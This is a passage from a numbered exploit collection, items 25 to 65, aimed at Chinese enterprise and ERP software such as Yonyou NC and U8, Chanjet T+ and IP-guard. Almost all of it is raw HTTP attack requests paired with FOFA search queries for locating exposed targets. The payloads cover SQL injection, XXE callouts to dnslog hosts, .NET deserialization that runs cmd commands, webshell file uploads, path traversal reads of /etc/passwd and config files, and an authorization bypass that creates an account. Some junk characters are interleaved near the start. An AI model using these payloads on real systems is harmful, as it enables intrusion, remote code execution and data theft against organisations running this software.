Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

  ?# |4 T! k: n: X25. 用友NC registerServlet JNDI 远程代码执行* s1 I/ u: C, A- G; k& ~0 \
FOFA:app="用友-UFIDA-NC", k1 Y: k! v0 W) ?& x  @" D
POST /portal/registerServlet HTTP/1.1
7 b9 n( ]4 z& H/ {# D3 UHost: your-ip# k& g: I4 T6 j& N% N; O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.07 P3 T/ k" [. b1 c6 k2 x' \1 m; s. G, g, w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
& `) f4 r- w" _- WAccept-Encoding: gzip, deflate
6 M3 K. _# H: M/ M0 o; zAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
1 X% ~( ~$ Y# w& t7 U' hContent-Type: application/x-www-form-urlencoded
2 Z/ F! F  f# _% [; r$ c, W" ?; Z) G7 o
type=1&dsname=ldap://dnslog
( q% j( K8 l- @! ~( |3 Z" d/ d0 [( p2 I7 v' m% W
7 K3 I, b$ e9 h
  ?/ \' u* M& ]6 y
26. Yonyou NC (用友NC) linkVoucher SQL injection
FOFA: app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC (用友NC) showcontent SQL injection
FOFA: icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC (用友NC) grouptemplet arbitrary file upload
FOFA: icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC (用友NC) down/bill SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC (用友NC) importPml SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC (用友NC) runStateServlet SQL injection
Version: <=6.5
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC (用友NC) complainbilldetail SQL injection
Versions: NC633, NC65
FOFA: app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC (用友NC) downTax/download SQL injection
Version: NC6.5
FOFA: app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC (用友NC) warningDetailInfo SQL injection
FOFA: app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud (用友NC-Cloud) importhttpscer arbitrary file upload
FOFA: app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud (用友NC-Cloud) soapFormat XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud (用友NC-Cloud) IUpdateService XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud (用友U8 Cloud) smartweb2.RPC.d XXE
FOFA: app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud (用友U8 Cloud) RegisterServlet SQL injection
FOFA: title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud (用友U8-Cloud) XChangeServlet XXE
FOFA: app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud (用友U8 Cloud) MeasureQueryByToolAction SQL injection
FOFA: app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 (用友GRP-U8) SmartUpload01 file upload
FOFA: app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 (用友GRP-U8) userInfoWeb SQL injection leading to RCE
FOFA: app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 (用友GRP-U8) bx_dj_check.jsp SQL injection
FOFA: app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 (用友GRP-U8) ufgovbank XXE
FOFA: app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 (用友GRP-U8) sqcxIndex.jsp SQL injection
FOFA: app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud (用友GRP A++Cloud 政府财务云) arbitrary file read
FOFA: body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM (用友U8 CRM) swfupload arbitrary file upload
FOFA: title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM (用友U8 CRM) uploadfile.php arbitrary file upload
FOFA: body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA: body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong social commerce ERP (云时空社会化商业ERP) validateLoginName SQL injection
FOFA: app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office (泛微E-Office) json_common.php SQL injection
FOFA: app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3

53. DPtech VPN Service (迪普 DPTech) arbitrary file upload (the POC shown is a path-traversal read of /etc/passwd)
FOFA: app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ (畅捷通T+) getstorewarehousebystore remote code execution
FOFA: app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL to confirm the file was written:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ (畅捷通T+) getdecallusers information disclosure
FOFA: app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ (畅捷通T+) RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ (畅捷通T+) keyEdit.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ (畅捷通T+) KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

